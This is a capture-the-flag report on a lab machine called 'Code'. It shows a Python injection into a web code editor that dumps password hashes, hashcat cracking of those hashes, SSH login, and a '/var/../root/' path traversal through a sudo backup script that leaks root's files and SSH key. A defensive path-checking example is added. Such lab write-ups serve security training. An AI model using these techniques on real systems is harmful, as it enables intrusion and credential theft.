Code
General Information
IP address: 10.10.11.62
Operating system name (distribution): Ubuntu 20.04.6 LTS
Operating system kernel version: Linux 5.4.0-208-generic
Web server software and version: gunicorn (version 20.0.4)
Open ports: 22, 5000
Flags Found
💡 Copy the flag into the designated section. Also add a screenshot of the
screen where the flag was found to this section.
User Flag
💡 User Flag: fe82069d64eb4c62d8d1d9b1818045ed
Root Flag
💡 Root Flag: fb1533b55157413073bf2d0b16417294
Vulnerabilities Found
💡 Fill in every vulnerability you found here and leave a link for more
detailed information about it. You should also explain here what the
vulnerability can lead to and which exploit is used to compromise it.
The first vulnerability listed is given to you as an example. Enter every
vulnerability you manage to find.
CVE-XXXX-XXXX: This CVE exists in version 2.X.X of program X and helps an attacker carry out attack X. This vulnerability is called the X vulnerability. It can be studied in detail via this link. [Leave a link here.]
Exploit link: must be provided if one exists.
Report
💡 Describe in detail what you did at each stage, with screenshots and the
exploits used.
Enumeration (Information Gathering)
┌──(kali㉿kali)-[~]
└─$ nmap -sSCV -Pn 10.10.11.62 --min-rate 10000
Starting Nmap 7.95 ( https://nmap.org ) at 2025-03-27 16:10 EDT
Nmap scan report for 10.10.11.62
Host is up (0.096s latency).
Not shown: 998 closed tcp ports (reset)
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 8.2p1 Ubuntu 4ubuntu0.12 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 3072 b5:b9:7c:c4:50:32:95:bc:c2:65:17:df:51:a2:7a:bd (RSA)
| 256 94:b5:25:54:9b:68:af:be:40:e1:1d:a8:6b:85:0d:01 (ECDSA)
|_ 256 12:8c:dc:97:ad:86:00:b4:88:e2:29:cf:69:b5:65:96 (ED25519)
5000/tcp open http Gunicorn 20.0.4
|_http-title: Python Code Editor
|_http-server-header: gunicorn/20.0.4
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 10.40 seconds
Port 5000 is open, so let's browse to it.
Exploitation (Breaking In)
The site is a web page for writing code. We now try to obtain the passwords
by submitting malicious code.
print([(user.id, user.username, user.password) for user in User.query.all()])
[(1, 'development', '759b74ce43947f5f4c91aeddc3e5bad3'),
(2, 'martin', '3de6f30c4a09c27fc71932bfc68474be')]
Now we recover the passwords behind these hashes with hashcat.
┌──(kali㉿kali)-[~]
└─$ echo "3de6f30c4a09c27fc71932bfc68474be" | hashid
Analyzing '3de6f30c4a09c27fc71932bfc68474be'
[+] MD2
[+] MD5
[+] MD4
[+] Double MD5
[+] LM
[+] RIPEMD-128
[+] Haval-128
[+] Tiger-128
[+] Skein-256(128)
[+] Skein-512(128)
[+] Lotus Notes/Domino 5
[+] Skype
[+] Snefru-128
[+] NTLM
[+] Domain Cached Credentials
[+] Domain Cached Credentials 2
[+] DNSSEC(NSEC3)
[+] RAdmin v2.x
Let's try hashcat in MD5 mode.
┌──(kali㉿kali)-[~]
└─$ hashcat -m 0 -a 0 hashes.txt /usr/share/wordlists/rockyou.txt
hashcat (v6.2.6) starting
OpenCL API (OpenCL 3.0 PoCL 6.0+debian Linux, None+Asserts, RELOC, LLVM 17.0.6, SLEEF, DISTRO, POCL_DEBUG) - Platform #1 [The pocl project]
============================================================================================================================================
* Device #1: cpu-sandybridge-12th Gen Intel(R) Core(TM) i7-12700H, 1242/2548 MB (512 MB allocatable), 4MCU
Minimum password length supported by kernel: 0
Maximum password length supported by kernel: 256
Hashes: 2 digests; 2 unique digests, 1 unique salts
Bitmaps: 16 bits, 65536 entries, 0x0000ffff mask, 262144 bytes, 5/13 rotates
Rules: 1
Optimizers applied:
* Zero-Byte
* Early-Skip
* Not-Salted
* Not-Iterated
* Single-Salt
* Raw-Hash
ATTENTION! Pure (unoptimized) backend kernels selected.
Pure kernels can crack longer passwords, but drastically reduce performance.
If you want to switch to optimized kernels, append -O to your commandline.
See the above message to find out about the exact limits.
Watchdog: Temperature abort trigger set to 90c
Host memory required for this attack: 0 MB
Dictionary cache built:
* Filename..: /usr/share/wordlists/rockyou.txt
* Passwords.: 14344394
* Bytes.....: 139921518
* Keyspace..: 14344387
* Runtime...: 1 sec
759b74ce43947f5f4c91aeddc3e5bad3:development
3de6f30c4a09c27fc71932bfc68474be:nafeelswordsmaster
Session..........: hashcat
Status...........: Cracked
Hash.Mode........: 0 (MD5)
Hash.Target......: hashes.txt
Time.Started.....: Thu Mar 27 15:08:44 2025 (2 secs)
Time.Estimated...: Thu Mar 27 15:08:46 2025 (0 secs)
Kernel.Feature...: Pure Kernel
Guess.Base.......: File (/usr/share/wordlists/rockyou.txt)
Guess.Queue......: 1/1 (100.00%)
Speed.#1.........: 3041.7 kH/s (0.07ms) @ Accel:256 Loops:1 Thr:1 Vec:8
Recovered........: 2/2 (100.00%) Digests (total), 2/2 (100.00%) Digests (new)
Progress.........: 5227520/14344387 (36.44%)
Rejected.........: 0/5227520 (0.00%)
Restore.Point....: 5226496/14344387 (36.44%)
Restore.Sub.#1...: Salt:0 Amplifier:0-1 Iteration:0-1
Candidate.Engine.: Device Generator
Candidates.#1....: nag3m16 -> naekgunung
Hardware.Mon.#1..: Util: 35%
Started: Thu Mar 27 15:08:41 2025
Stopped: Thu Mar 27 15:08:47 2025
development:development
martin:nafeelswordsmaster
Initial Access (Gaining Access)
Now let's try connecting as martin over SSH.
┌──(kali㉿kali)-[~]
└─$ ssh martin@10.10.11.62
The authenticity of host '10.10.11.62 (10.10.11.62)' can't be established.
ED25519 key fingerprint is SHA256:AlQsgTPYThQYa3z9ZAHkFiO/LqXA6T55FoT58A1zlAY.
This key is not known by any other names.
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added '10.10.11.62' (ED25519) to the list of known hosts.
martin@10.10.11.62's password:
Welcome to Ubuntu 20.04.6 LTS (GNU/Linux 5.4.0-208-generic x86_64)
* Documentation: https://help.ubuntu.com
* Management: https://landscape.canonical.com
* Support: https://ubuntu.com/pro
System information as of Thu 27 Mar 2025 07:13:59 PM UTC
System load: 0.85
Usage of /: 49.0% of 5.33GB
Memory usage: 13%
Swap usage: 0%
Processes: 265
Users logged in: 0
IPv4 address for eth0: 10.10.11.62
IPv6 address for eth0: dead:beef::250:56ff:fe94:f466
Expanded Security Maintenance for Applications is not enabled.
0 updates can be applied immediately.
Enable ESM Apps to receive additional future security updates.
See https://ubuntu.com/esm or run: sudo pro status
The list of available updates is more than a week old.
To check for new updates run: sudo apt update
Last login: Thu Mar 27 19:14:02 2025 from 10.10.15.7
martin@code:~$
Now let's check our privileges.
martin@code:~$ sudo -l
Matching Defaults entries for martin on localhost:
env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin
User martin may run the following commands on localhost:
(ALL : ALL) NOPASSWD: /usr/bin/backy.sh
martin@code:~$ cat /usr/bin/backy.sh
#!/bin/bash
if [[ $# -ne 1 ]]; then
    /usr/bin/echo "Usage: $0 <task.json>"
    exit 1
fi
json_file="$1"
if [[ ! -f "$json_file" ]]; then
    /usr/bin/echo "Error: File '$json_file' not found."
    exit 1
fi
allowed_paths=("/var/" "/home/")
updated_json=$(/usr/bin/jq '.directories_to_archive |= map(gsub("\\.\\./"; ""))' "$json_file")
/usr/bin/echo "$updated_json" > "$json_file"
directories_to_archive=$(/usr/bin/echo "$updated_json" | /usr/bin/jq -r '.directories_to_archive[]')
is_allowed_path() {
    local path="$1"
    for allowed_path in "${allowed_paths[@]}"; do
        if [[ "$path" == $allowed_path* ]]; then
            return 0
        fi
    done
    return 1
}
for dir in $directories_to_archive; do
    if ! is_allowed_path "$dir"; then
        /usr/bin/echo "Error: $dir is not allowed. Only directories under /var/ and /home/ are allowed."
        exit 1
    fi
done
/usr/bin/backy "$json_file"
This Bash script checks the directories listed in the "directories_to_archive"
array of the given JSON file (task.json) and forces them to be located under
"/var/" or "/home/".
How does the script work?
1. Checks the argument – it must receive exactly one argument (task.json).
2. Checks that the file exists – prints an error if it cannot find the JSON file.
3. Sanitizes the paths – removes "../" using jq.
4. Checks the allowed directories – permits only directories under "/var/" or
"/home/".
5. If there are no errors, runs the command /usr/bin/backy "$json_file".
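Steps 3 and 4 are string operations: deleting "../" and then matching a prefix never resolves the path, so a value such as /var/../root/ still begins with /var/. The following is an added example, not code from the target machine or from backy: a POSIX sh rendering of the script's prefix test next to a check that canonicalizes with realpath first. The sandbox tree, ALLOWED_ROOTS and all function names are assumptions made for the demonstration.

```shell
#!/bin/sh
# Added example, not backy.sh itself. ALLOWED_ROOTS, the sandbox layout and
# every function name here are assumptions made for this demonstration.

# Build a throwaway tree that mirrors /var, /home and /root (constructed data).
make_sandbox() {
    SANDBOX=$(mktemp -d) || return 1
    mkdir -p "$SANDBOX/var/log" "$SANDBOX/home/martin" "$SANDBOX/root"
    ln -s "$SANDBOX/root" "$SANDBOX/var/link"   # symlink that leaves the allowed tree
    # Space-separated list; assumes the sandbox path contains no whitespace.
    ALLOWED_ROOTS="$SANDBOX/var/ $SANDBOX/home/"
}

# The script's test, rendered in POSIX sh: a plain string-prefix match.
is_allowed_prefix() {
    for root in $ALLOWED_ROOTS; do
        case "$1" in
            "$root"*) return 0 ;;
        esac
    done
    return 1
}

# Hardened test: resolve "..", "." and symlinks first, then compare the
# canonical path against each canonical root on a directory boundary.
is_allowed_canonical() {
    case "$1" in
        /*) ;;
        *) return 1 ;;                                  # refuse relative paths
    esac
    resolved=$(realpath "$1" 2>/dev/null) || return 1   # path must resolve
    for root in $ALLOWED_ROOTS; do
        root_real=$(realpath "$root" 2>/dev/null) || continue
        case "$resolved/" in
            "$root_real"/*) return 0 ;;
        esac
    done
    return 1
}

# Turn a check's exit status into a word for the comparison table.
verdict() {
    if "$1" "$2"; then echo allow; else echo deny; fi
}

make_sandbox || exit 1
printf '%-8s %-10s %s\n' prefix canonical path
for p in "$SANDBOX/var/log" "$SANDBOX/var/../root/" "$SANDBOX/var/link"; do
    printf '%-8s %-10s %s\n' \
        "$(verdict is_allowed_prefix "$p")" \
        "$(verdict is_allowed_canonical "$p")" \
        "${p#"$SANDBOX"}"
done
rm -rf "$SANDBOX"
```

A wrapper built this way should hand the resolved path, not the original string, to the archiver, so the value that was validated is the value that gets used.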
martin@code:~$ cat /etc/passwd
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
sys:x:3:3:sys:/dev:/usr/sbin/nologin
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/usr/sbin/nologin
man:x:6:12:man:/var/cache/man:/usr/sbin/nologin
lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
mail:x:8:8:mail:/var/mail:/usr/sbin/nologin
news:x:9:9:news:/var/spool/news:/usr/sbin/nologin
uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin
proxy:x:13:13:proxy:/bin:/usr/sbin/nologin
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
backup:x:34:34:backup:/var/backups:/usr/sbin/nologin
list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin
irc:x:39:39:ircd:/var/run/ircd:/usr/sbin/nologin
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin
nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin
systemd-network:x:100:102:systemd Network Management,,,:/run/systemd:/usr/sbin/nologin
systemd-resolve:x:101:103:systemd Resolver,,,:/run/systemd:/usr/sbin/nologin
systemd-timesync:x:102:104:systemd Time Synchronization,,,:/run/systemd:/usr/sbin/nologin
messagebus:x:103:106::/nonexistent:/usr/sbin/nologin
syslog:x:104:110::/home/syslog:/usr/sbin/nologin
_apt:x:105:65534::/nonexistent:/usr/sbin/nologin
tss:x:106:111:TPM software stack,,,:/var/lib/tpm:/bin/false
uuidd:x:107:112::/run/uuidd:/usr/sbin/nologin
tcpdump:x:108:113::/nonexistent:/usr/sbin/nologin
landscape:x:109:115::/var/lib/landscape:/usr/sbin/nologin
pollinate:x:110:1::/var/cache/pollinate:/bin/false
fwupd-refresh:x:111:116:fwupd-refresh user,,,:/run/systemd:/usr/sbin/nologin
usbmux:x:112:46:usbmux daemon,,,:/var/lib/usbmux:/usr/sbin/nologin
sshd:x:113:65534::/run/sshd:/usr/sbin/nologin
systemd-coredump:x:999:999:systemd Core Dumper:/:/usr/sbin/nologin
lxd:x:998:100::/var/snap/lxd/common/lxd:/bin/false
app-production:x:1001:1001:,,,:/home/app-production:/bin/bash
martin:x:1000:1000:,,,:/home/martin:/bin/bash
_laurel:x:997:997::/var/log/laurel:/bin/false
Now we edit the task file (task.json) passed to the script and try to obtain user.txt.
martin@code:~/backups$ cat task.json
{
    "destination": "/home/martin/",
    "multiprocessing": true,
    "verbose_log": false,
    "directories_to_archive": [
        "/home/app-production/user.txt"
    ],
    "exclude": [
        ".*"
    ]
}
martin@code:~/backups$ sudo /usr/bin/backy.sh task.json
2025/03/27 19:29:36 🍀 backy 1.2
2025/03/27 19:29:36 📋 Working with task.json ...
2025/03/27 19:29:36 💤 Nothing to sync
2025/03/27 19:29:36 📤 Archiving: [/home/app-production/user.txt]
2025/03/27 19:29:36 📥 To: /home/martin ...
2025/03/27 19:29:36 📦
martin@code:~/backups$
Now we go back to the home directory and extract the archive.
martin@code:~$ tar -xjf code_home_app-production_user.txt_2025_March.tar.bz2
martin@code:~$ ll
total 44
drwxr-x--- 7 martin martin 4096 Mar 27 19:31 ./
drwxr-xr-x 4 root root 4096 Aug 27 2024 ../
drwxr-xr-x 2 martin martin 4096 Mar 27 19:30 backups/
lrwxrwxrwx 1 root root 9 Aug 27 2024 .bash_history -> /dev/null
-rw-r--r-- 1 martin martin 220 Aug 27 2024 .bash_logout
-rw-r--r-- 1 martin martin 3771 Aug 27 2024 .bashrc
drwx------ 2 martin martin 4096 Mar 27 19:30 .cache/
-rw-r--r-- 1 root root 174 Mar 27 19:30 code_home_app-production_user.txt_2025_March.tar.bz2
drwxrwxr-x 3 martin martin 4096 Mar 27 19:31 home/
drwxrwxr-x 3 martin martin 4096 Mar 27 19:30 .local/
-rw-r--r-- 1 martin martin 807 Aug 27 2024 .profile
lrwxrwxrwx 1 root root 9 Aug 27 2024 .python_history -> /dev/null
lrwxrwxrwx 1 root root 9 Aug 27 2024 .sqlite_history -> /dev/null
drwx------ 2 martin martin 4096 Sep 16 2024 .ssh/
martin@code:~$ cd home/
martin@code:~/home$ ll
total 12
drwxrwxr-x 3 martin martin 4096 Mar 27 19:31 ./
drwxr-x--- 7 martin martin 4096 Mar 27 19:31 ../
drwxrwxr-x 2 martin martin 4096 Mar 27 19:31 app-production/
martin@code:~/home$ cd app-production/
martin@code:~/home/app-production$ ll
total 12
drwxrwxr-x 2 martin martin 4096 Mar 27 19:31 ./
drwxrwxr-x 3 martin martin 4096 Mar 27 19:31 ../
-rw-r----- 1 martin martin 33 Mar 27 19:13 user.txt
martin@code:~/home/app-production$ cat user.txt
fe82069d64eb4c62d8d1d9b1818045ed
Privilege Escalation (Raising Privileges)
Now let's try to obtain root.txt.
martin@code:~/backups$ cat task.json
{
    "destination": "/home/martin/",
    "multiprocessing": true,
    "verbose_log": true,
    "directories_to_archive": [
        "/var/../root/"
    ]
}
martin@code:~/backups$ sudo /usr/bin/backy.sh task.json
2025/03/27 19:38:42 🍀 backy 1.2
2025/03/27 19:38:42 📋 Working with task.json ...
2025/03/27 19:38:42 💤 Nothing to sync
2025/03/27 19:38:42 📤 Archiving: [/var/../root]
2025/03/27 19:38:42 📥 To: /home/martin ...
2025/03/27 19:38:42 📦
tar: Removing leading `/var/../' from member names
/var/../root/
/var/../root/.local/
/var/../root/.local/share/
/var/../root/.local/share/nano/
/var/../root/.local/share/nano/search_history
/var/../root/.sqlite_history
/var/../root/.profile
/var/../root/scripts/
/var/../root/scripts/cleanup.sh
/var/../root/scripts/backups/
/var/../root/scripts/backups/task.json
/var/../root/scripts/backups/code_home_app-production_app_2024_August.tar.bz2
/var/../root/scripts/database.db
/var/../root/scripts/cleanup2.sh
/var/../root/.python_history
/var/../root/root.txt
/var/../root/.cache/
/var/../root/.cache/motd.legal-displayed
/var/../root/.ssh/
/var/../root/.ssh/id_rsa
/var/../root/.ssh/authorized_keys
/var/../root/.bash_history
/var/../root/.bashrc
martin@code:~$ tar -xjf code_var_.._root_2025_March.tar.bz2
martin@code:~$ ll
total 56
drwxr-x--- 7 martin martin 4096 Mar 27 19:39 ./
drwxr-xr-x 4 root root 4096 Aug 27 2024 ../
drwxr-xr-x 2 martin martin 4096 Mar 27 19:38 backups/
lrwxrwxrwx 1 root root 9 Aug 27 2024 .bash_history -> /dev/null
-rw-r--r-- 1 martin martin 220 Aug 27 2024 .bash_logout
-rw-r--r-- 1 martin martin 3771 Aug 27 2024 .bashrc
drwx------ 2 martin martin 4096 Mar 27 19:30 .cache/
-rw-r--r-- 1 root root 12829 Mar 27 19:38 code_var_.._root_2025_March.tar.bz2
drwxrwxr-x 3 martin martin 4096 Mar 27 19:38 .local/
-rw-r--r-- 1 martin martin 807 Aug 27 2024 .profile
lrwxrwxrwx 1 root root 9 Aug 27 2024 .python_history -> /dev/null
drwx------ 6 martin martin 4096 Mar 27 19:13 root/
lrwxrwxrwx 1 root root 9 Aug 27 2024 .sqlite_history -> /dev/null
drwx------ 2 martin martin 4096 Sep 16 2024 .ssh/
martin@code:~$ cd root/
martin@code:~/root$ ll
total 36
drwx------ 6 martin martin 4096 Mar 27 19:13 ./
drwxr-x--- 7 martin martin 4096 Mar 27 19:39 ../
lrwxrwxrwx 1 martin martin 9 Jul 27 2024 .bash_history -> /dev/null
-rw-r--r-- 1 martin martin 3106 Dec 5 2019 .bashrc
drwx------ 2 martin martin 4096 Aug 27 2024 .cache/
drwxr-xr-x 3 martin martin 4096 Jul 27 2024 .local/
-rw-r--r-- 1 martin martin 161 Dec 5 2019 .profile
lrwxrwxrwx 1 martin martin 9 Jul 27 2024 .python_history -> /dev/null
-rw-r----- 1 martin martin 33 Mar 27 19:13 root.txt
drwxr-xr-x 3 martin martin 4096 Sep 16 2024 scripts/
lrwxrwxrwx 1 martin martin 9 Jul 27 2024 .sqlite_history -> /dev/null
drwx------ 2 martin martin 4096 Aug 27 2024 .ssh/
martin@code:~/root$ cat root.txt
fb1533b55157413073bf2d0b16417294
martin@code:~/root$
Now we log in as root using id_rsa.
martin@code:~/root$ cd .ssh/
martin@code:~/root/.ssh$ ll
total 16
drwx------ 2 martin martin 4096 Aug 27 2024 ./
drwx------ 6 martin martin 4096 Mar 27 19:13 ../
-rw-r--r-- 1 martin martin 563 Aug 27 2024 authorized_keys
-rw------- 1 martin martin 2590 Aug 27 2024 id_rsa
martin@code:~/root/.ssh$ cat id_rsa
martin@code:~/root/.ssh$
Now we take the private key, save it on Kali, set its permissions with chmod 600,
and connect as root over SSH.
┌──(kali㉿kali)-[~]
└─$ vim id
┌──(kali㉿kali)-[~]
└─$ chmod 600 id
┌──(kali㉿kali)-[~]
└─$ ssh -i id root@10.10.11.62
Welcome to Ubuntu 20.04.6 LTS (GNU/Linux 5.4.0-208-generic x86_64)
* Documentation: https://help.ubuntu.com
* Management: https://landscape.canonical.com
* Support: https://ubuntu.com/pro
System information as of Thu 27 Mar 2025 07:48:10 PM UTC
System load: 0.0
Usage of /: 51.4% of 5.33GB
Memory usage: 14%
Swap usage: 0%
Processes: 246
Users logged in: 1
IPv4 address for eth0: 10.10.11.62
IPv6 address for eth0: dead:beef::250:56ff:fe94:f466
Expanded Security Maintenance for Applications is not enabled.
0 updates can be applied immediately.
Enable ESM Apps to receive additional future security updates.
See https://ubuntu.com/esm or run: sudo pro status
The list of available updates is more than a week old.
To check for new updates run: sudo apt update
Failed to connect to https://changelogs.ubuntu.com/meta-release-lts. Check your Internet connection or proxy settings
Last login: Thu Mar 27 19:48:10 2025 from 10.10.15.7
root@code:~# ll
total 36
drwx------ 6 root root 4096 Mar 27 19:49 ./
drwxr-xr-x 18 root root 4096 Feb 24 19:44 ../
lrwxrwxrwx 1 root root 9 Jul 27 2024 .bash_history -> /dev/null
-rw-r--r-- 1 root root 3106 Dec 5 2019 .bashrc
drwx------ 2 root root 4096 Aug 27 2024 .cache/
drwxr-xr-x 3 root root 4096 Jul 27 2024 .local/
-rw-r--r-- 1 root root 161 Dec 5 2019 .profile
lrwxrwxrwx 1 root root 9 Jul 27 2024 .python_history -> /dev/null
-rw-r----- 1 root root 33 Mar 27 19:49 root.txt
drwxr-xr-x 3 root root 4096 Sep 16 2024 scripts/
lrwxrwxrwx 1 root root 9 Jul 27 2024 .sqlite_history -> /dev/null
drwx------ 2 root root 4096 Aug 27 2024 .ssh/
root@code:~# id
uid=0(root) gid=0(root) groups=0(root)
root@code:~# hostnamectl
Static hostname: code
Icon name: computer-vm
Chassis: vm
Machine ID: 29b75301340e4b99a4db1d7380c8170f
Boot ID: 621c6557932a4ef5938c9a192d327b5a
Virtualization: vmware
Operating System: Ubuntu 20.04.6 LTS
Kernel: Linux 5.4.0-208-generic
Architecture: x86-64
root@code:/var# netstat -tulnp | grep 5000
tcp 0 0 0.0.0.0:5000 0.0.0.0:* LISTEN 1207/python3
root@code:/var# ps -fp 1207
UID PID PPID C STIME TTY TIME CMD
app-pro+ 1207 1 0 19:50 ? 00:00:00 /usr/bin/python3 /usr/bin/gunicorn --workers 8 --bind 0.0.0.0:5000 --access-logfile /dev/null --error-logfile /dev/null app:app
root@code:/var# ls -l /proc/1207/cwd
lrwxrwxrwx 1 app-production app-production 0 Mar 27 19:53 /proc/1207/cwd -> /home/app-production/app
root@code:/var# gunicorn --version
gunicorn (version 20.0.4)
================================================================================
root@code:/home/app-production/app# lsof +D /home/app-production/app
COMMAND PID USER FD TYPE DEVICE SIZE/OFF NODE NAME
bash 1359 root cwd DIR 253,0 4096 157206 /home/app-production/app
gunicorn 31254 app-production cwd DIR 253,0 4096 157206 /home/app-production/app
gunicorn 31258 app-production cwd DIR 253,0 4096 157206 /home/app-production/app
gunicorn 31259 app-production cwd DIR 253,0 4096 157206 /home/app-production/app
gunicorn 31260 app-production cwd DIR 253,0 4096 157206 /home/app-production/app
gunicorn 31261 app-production cwd DIR 253,0 4096 157206 /home/app-production/app
gunicorn 31262 app-production cwd DIR 253,0 4096 157206 /home/app-production/app
gunicorn 31263 app-production cwd DIR 253,0 4096 157206 /home/app-production/app
gunicorn 31264 app-production cwd DIR 253,0 4096 157206 /home/app-production/app
gunicorn 31265 app-production cwd DIR 253,0 4096 157206 /home/app-production/app
lsof 31760 root cwd DIR 253,0 4096 157206 /home/app-production/app
lsof 31761 root cwd DIR 253,0 4096 157206 /home/app-production/app
root@code:~# cat /proc/31254/cmdline
/usr/bin/python3 /usr/bin/gunicorn --workers 8 --bind 0.0.0.0:5000 --access-logfile /dev/null --error-logfile /dev/null app:app